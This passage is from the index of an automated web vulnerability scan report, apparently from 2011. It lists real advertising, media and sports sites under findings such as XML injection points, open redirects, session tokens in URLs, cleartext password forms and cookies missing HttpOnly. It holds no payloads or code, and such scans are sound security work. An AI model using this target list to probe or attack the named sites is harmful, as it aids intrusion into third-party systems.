5.10. http://server.cpmstar.com/crossdomain.xml

5.11. http://tags.bluekai.com/crossdomain.xml

5.12. http://ad.wsod.com/crossdomain.xml

5.13. http://ads.adbrite.com/crossdomain.xml

5.14. http://my.yahoo.com/crossdomain.xml

5.15. http://s.media-imdb.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://matrix.hbo.com/clientaccesspolicy.xml

6.2. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

7.2. http://www.mavsmoneyball.com/2011/6/3/2205973/a-message-from-the-rest-of-us

7.3. http://www.mavsmoneyball.com/fanposts

7.4. http://www.mavsmoneyball.com/mavericks-tickets

8. XML injection

8.1. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 1]

8.2. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 2]

8.3. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 3]

8.4. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 4]

8.5. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 5]

8.6. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 6]

8.7. http://cdn.bleacherreport.net/images_root/images/photos/000/827/871/96813877.jpg.17952_crop_340x234.jpg [REST URL parameter 7]

8.8. http://load.exelator.com/load/ [REST URL parameter 1]

8.9. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

8.10. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.11. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.12. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]

8.13. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]

8.14. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 1]

8.15. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 2]

8.16. http://s.meebocdn.net/cim/script/cim_v92_cim_11_10_2.en.js [REST URL parameter 3]

8.17. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 1]

8.18. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 2]

8.19. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_10_2.en.js [REST URL parameter 3]

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://www.apture.com/js/apture.js

9.3. http://www.facebook.com/extern/login_status.php

9.4. http://www.google.com/recaptcha/api/challenge

10. SSL certificate

11. Open redirection

11.1. http://b.scorecardresearch.com/r [d.c parameter]

11.2. http://r.nexac.com/e/getdata.xgi [ru parameter]

11.3. http://u.openx.net/w/1.0/sc [r parameter]

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/FanSided/lists//statuses.json

12.2. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

12.3. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif

12.4. http://a.tribalfusion.com/i.cid

12.5. http://a.tribalfusion.com/j.ad

12.6. http://ad.afy11.net/ad

12.7. http://ad.amgdgt.com/ads/

12.8. http://ad.amgdgt.com/ads/t=c/s=.../clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

12.9. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC....http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

12.10. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13

12.11. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23

12.12. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2

12.13. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137

12.14. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

12.15. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

12.16. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

12.17. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

12.18. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

12.19. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

12.20. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

12.21. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

12.22. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34

12.23. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10

12.24. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

12.25. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7

12.26. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4

12.27. http://ad.doubleclick.net/adj/buz.idolator/content

12.28. http://ad.doubleclick.net/adj/cm.mtv/ent_010111

12.29. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

12.30. http://ad.doubleclick.net/adj/oiq.rmx/

12.31. http://ad.doubleclick.net/click

12.32. http://ad.turn.com/server/ads.js

12.33. http://ad.turn.com/server/pixel.htm

12.34. http://admeld.adnxs.com/usersync

12.35. http://admeld.lucidmedia.com/clicksense/admeld/match

12.36. http://adopt.imiclk.com/emb/q

12.37. http://ads.adbrite.com/adserver/vdi/742697

12.38. http://ads.revsci.net/adserver/ako

12.39. http://ak1.abmr.net/is/adopt.imiclk.com

12.40. http://ak1.abmr.net/is/tag.admeld.com

12.41. http://ak1.abmr.net/is/www.burstnet.com

12.42. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1

12.43. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11

12.44. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php

12.45. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php

12.46. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php

12.47. http://api.bizographics.com/v1/profile.redirect

12.48. http://apr.lijit.com///www/delivery/ajs.php

12.49. http://ar.voicefive.com/b/recruitBeacon.pli

12.50. http://ar.voicefive.com/b/recruitBeacon.pli

12.51. http://ar.voicefive.com/b/wc_beacon.pli

12.52. http://ar.voicefive.com/bmx3/broker.pli

12.53. http://at.amgdgt.com/ads/

12.54. http://b.scorecardresearch.com/b

12.55. http://b.scorecardresearch.com/p

12.56. http://b.scorecardresearch.com/r

12.57. http://b.voicefive.com/b

12.58. http://b.voicefive.com/p

12.59. http://bh.contextweb.com/bh/rtset

12.60. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.61. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.62. http://ce.lijit.com/merge

12.63. http://cm.npc-lee.overture.com/js_1_0/

12.64. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

12.65. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

12.66. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

12.67. http://d.chango.com/collector/admeldpixel

12.68. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

12.69. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

12.70. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

12.71. http://d.xp1.ru4.com/meta

12.72. http://d.xp1.ru4.com/meta

12.73. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js

12.74. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js

12.75. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js

12.76. http://d7.zedo.com/img/bh.gif

12.77. http://gdyn.nba.com/1.1/1.gif

12.78. http://glam.grapeshot.co.uk/main/redirect.cgi

12.79. http://ib.adnxs.com/ab

12.80. http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http://www.twackle.com/headlines/clickenc=http://adclick.g.doubleclick.net/aclk

12.81. http://ib.adnxs.com/getuid

12.82. http://ib.adnxs.com/getuidnb

12.83. http://ib.adnxs.com/mapuid

12.84. http://ib.adnxs.com/ptj

12.85. http://ib.adnxs.com/ptj

12.86. http://ib.adnxs.com/seg

12.87. http://image2.pubmatic.com/AdServer/Pug

12.88. http://img137.imageshack.us/img137/4291/d5zee1.jpg

12.89. http://img690.imageshack.us/img690/7868/umadbroz.jpg

12.90. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png

12.91. http://imp.constantcontact.com/imp/cmp.jsp

12.92. http://js.revsci.net/gateway/gw.js

12.93. http://load.exelator.com/load/

12.94. http://m.adnxs.com/msftcookiehandler

12.95. http://m.xp1.ru4.com/meta

12.96. http://media.fastclick.net/w/tre

12.97. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

12.98. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1

12.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1

12.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1

12.101. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js

12.102. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js

12.103. http://p.brilig.com/contact/bct

12.104. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js

12.105. http://pix04.revsci.net/D10889/a1/0/3/0.gif

12.106. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js

12.107. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js

12.108. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js

12.109. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

12.110. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif

12.111. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js

12.112. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js

12.113. http://pixel.invitemedia.com/data_sync

12.114. http://pixel.quantserve.com/pixel

12.115. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

12.116. http://pixel.rubiconproject.com/di.php

12.117. http://pixel.rubiconproject.com/tap.php

12.118. http://r.openx.net/set

12.119. http://r.turn.com/r/bd

12.120. http://r.turn.com/r/beacon

12.121. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

12.122. http://rs.gwallet.com/r1/pixel/x420r9190030

12.123. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583

12.124. http://segments.adap.tv/data/

12.125. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

12.126. http://services.krxd.net/geoip

12.127. http://services.krxd.net/pixel.gif

12.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.129. http://sis.amazon.com/iu

12.130. http://srv.clickfuse.com/pixels/delete.php

12.131. http://stgapi.choicestream.com/instr/csanywhere.js

12.132. http://sync.adap.tv/sync

12.133. http://sync.mathtag.com/sync

12.134. http://syndication.mmismm.com/tntwo.php

12.135. http://t.flux.com/tracking.gif

12.136. http://t.invitemedia.com/track_imp

12.137. http://tags.bluekai.com/site/2312

12.138. http://tags.bluekai.com/site/2731

12.139. http://tags.bluekai.com/site/2736

12.140. http://tags.bluekai.com/site/3113

12.141. http://tags.bluekai.com/site/353

12.142. http://tap.rubiconproject.com/oz/feeds/targus/profile

12.143. http://tap.rubiconproject.com/oz/sensor

12.144. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

12.145. http://tiger.vizu.com/a.gif

12.146. http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530

12.147. http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif

12.148. http://tvfanatic.us.intellitxt.com/intellitxt/front.asp

12.149. http://u.openx.net/w/1.0/sc

12.150. http://vap3den1.lijit.com/www/delivery/lg.php

12.151. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979

12.152. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058

12.153. http://vt.imiclk.com/cgi/vtc.cgi

12.154. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

12.155. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

12.156. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

12.157. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

12.158. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

12.159. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

12.160. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

12.161. http://www.expedia.com/hotel.h892034.Hotel-Information

12.162. http://www.imdb.com/title/tt0944947/

12.163. http://www.lijit.com/beacon

12.164. http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx

12.165. http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction

12.166. http://www.wtp101.com/admeld_sync

12.167. http://www.wtp101.com/cox_sync

12.168. http://www22.glam.com/cTagsImgCmd.act

13. Cookie without HttpOnly flag set

13.1. http://ads.adxpose.com/ads/ads.js

13.2. http://dg.specificclick.net/

13.3. http://event.adxpose.com/event.flow

13.4. http://fansided.com/category/nba

13.5. http://idolator.com/favicon.ico

13.6. http://kotaku.com/

13.7. http://kotaku.com/index.php

13.8. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

13.9. http://www.nba.com/mavericks/index_main.html

13.10. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif

13.11. http://www.ugo.com/takeover/takeover.html

13.12. http://www.ugo.com/takeover/takeover.js

13.13. http://a.tribalfusion.com/i.cid

13.14. http://a.tribalfusion.com/j.ad

13.15. http://ad.afy11.net/ad

13.16. http://ad.amgdgt.com/ads/

13.17. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

13.18. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.…http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

13.19. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13

13.20. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23

13.21. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2

13.22. http://ad.doubleclick.net/ad/N6457.131643.MEEBO/B4840137

13.23. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

13.24. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

13.25. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

13.26. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

13.27. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

13.28. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

13.29. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

13.30. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

13.31. http://ad.doubleclick.net/adj/N3727.Expedia.com/B5235969.34

13.32. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.10

13.33. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11

13.34. http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.7

13.35. http://ad.doubleclick.net/adj/N6294.149112.GLAMMEDIA.COM/B5303021.4

13.36. http://ad.doubleclick.net/adj/buz.idolator/content

13.37. http://ad.doubleclick.net/adj/cm.mtv/ent_010111

13.38. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

13.39. http://ad.doubleclick.net/adj/oiq.rmx/

13.40. http://ad.doubleclick.net/click

13.41. http://ad.turn.com/server/ads.js

13.42. http://ad.turn.com/server/pixel.htm

13.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

13.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

13.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

13.46. http://ad.yieldmanager.com/iframe3

13.47. http://ad.yieldmanager.com/imp

13.48. http://ad.yieldmanager.com/imp

13.49. http://ad.yieldmanager.com/pixel

13.50. http://ad.yieldmanager.com/unpixel

13.51. http://admeld.lucidmedia.com/clicksense/admeld/match

13.52. http://adopt.imiclk.com/emb/q

13.53. http://ads.ad4game.com/www/delivery/ajs.php

13.54. http://ads.adbrite.com/adserver/vdi/742697

13.55. http://ads.cpxadroit.com/adserver/10-1TZ6SMYM9UGQB.cpxad

13.56. http://ads.gamershell.com/delivery/al.php

13.57. http://ads.gamershell.com/www/delivery/ajs.php

13.58. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.59. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.60. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.61. http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.62. http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.63. http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.64. http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.65. http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.66. http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

13.67. http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

13.68. http://ads.revsci.net/adserver/ako

13.69. http://ads.undertone.com/f

13.70. http://ak1.abmr.net/is/adopt.imiclk.com

13.71. http://ak1.abmr.net/is/tag.admeld.com

13.72. http://ak1.abmr.net/is/www.burstnet.com

13.73. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1

13.74. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11

13.75. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php

13.76. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php

13.77. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php

13.78. http://api.bizographics.com/v1/profile.redirect

13.79. http://api.twitter.com/1/FanSided/lists//statuses.json

13.80. http://apr.lijit.com///www/delivery/ajs.php

13.81. http://ar.voicefive.com/b/recruitBeacon.pli

13.82. http://ar.voicefive.com/b/recruitBeacon.pli

13.83. http://ar.voicefive.com/b/wc_beacon.pli

13.84. http://ar.voicefive.com/bmx3/broker.pli

13.85. http://at.amgdgt.com/ads/

13.86. http://b.scorecardresearch.com/b

13.87. http://b.scorecardresearch.com/p

13.88. http://b.scorecardresearch.com/r

13.89. http://b.voicefive.com/b

13.90. http://b.voicefive.com/p

13.91. http://beacon.dmsinsights.com/beacon/1103771/2

13.92. http://bh.contextweb.com/bh/rtset

13.93. http://bpx.a9.com/ads/getad

13.94. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.95. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.96. http://btg.mtvnservices.com/aria/guid.html

13.97. http://ce.lijit.com/merge

13.98. http://cm.npc-lee.overture.com/js_1_0/

13.99. http://csc.beap.ad.yieldmanager.net/i

13.100. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/OBXRF4HH6JFXLDDVFSEQTM

13.101. http://d.adroll.com/view/7e0e346171a4d3507190678e09366eb4

13.102. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830

13.103. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830

13.104. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

13.105. http://d.chango.com/collector/admeldpixel

13.106. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830

13.107. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830

13.108. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

13.109. http://d.xp1.ru4.com/meta

13.110. http://d.xp1.ru4.com/meta

13.111. http://d1.openx.org/lg.php

13.112. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js

13.113. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js

13.114. http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js

13.115. http://d7.zedo.com/img/bh.gif

13.116. http://gdyn.nba.com/1.1/1.gif

13.117. http://glam.grapeshot.co.uk/main/redirect.cgi

13.118. http://image2.pubmatic.com/AdServer/Pug

13.119. http://img137.imageshack.us/img137/4291/d5zee1.jpg

13.120. http://img690.imageshack.us/img690/7868/umadbroz.jpg

13.121. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png

13.122. http://imp.constantcontact.com/imp/cmp.jsp

13.123. http://js.revsci.net/gateway/gw.js

13.124. http://load.exelator.com/load/

13.125. http://m.xp1.ru4.com/meta

13.126. http://media.fastclick.net/w/tre

13.127. http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif

13.128. http://my.yahoo.com/e/df

13.129. http://my.yahoo.com/e/js

13.130. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1

13.131. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1

13.132. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1

13.133. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js

13.134. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js

13.135. http://ox-d.sbnation.com/w/1.0/ajs

13.136. http://p.brilig.com/contact/bct

13.137. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js

13.138. http://pix04.revsci.net/D10889/a1/0/3/0.gif

13.139. http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js

13.140. http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js

13.141. http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js

13.142. http://pix04.revsci.net/E06560/b3/0/3/noscript.gif

13.143. http://pix04.revsci.net/G07610/b3/0/3/noscript.gif

13.144. http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js

13.145. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js

13.146. http://pixel.invitemedia.com/data_sync

13.147. http://pixel.quantserve.com/pixel

13.148. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

13.149. http://pixel.rubiconproject.com/di.php

13.150. http://pixel.rubiconproject.com/tap.php

13.151. http://r.openx.net/set

13.152. http://r.turn.com/r/bd

13.153. http://r.turn.com/r/beacon

13.154. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

13.155. http://rs.gwallet.com/r1/pixel/x420r9190030

13.156. http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583

13.157. http://segments.adap.tv/data/

13.158. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221

13.159. http://server.cpmstar.com/brilig.aspx

13.160. http://services.krxd.net/geoip

13.161. http://services.krxd.net/pixel.gif

13.162. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.163. http://sis.amazon.com/iu

13.164. http://srv.clickfuse.com/pixels/delete.php

13.165. http://stgapi.choicestream.com/instr/csanywhere.js

13.166. http://sync.adap.tv/sync

13.167. http://sync.mathtag.com/sync

13.168. http://syndication.mmismm.com/tntwo.php

13.169. http://t.invitemedia.com/track_imp

13.170. http://tag.admeld.com/ad/js/195/fsv/728x90/ros

13.171. http://tags.bluekai.com/site/2312

13.172. http://tags.bluekai.com/site/2731

13.173. http://tags.bluekai.com/site/2736

13.174. http://tags.bluekai.com/site/3113

13.175. http://tags.bluekai.com/site/353

13.176. http://tap.rubiconproject.com/oz/feeds/targus/profile

13.177. http://tap.rubiconproject.com/oz/sensor

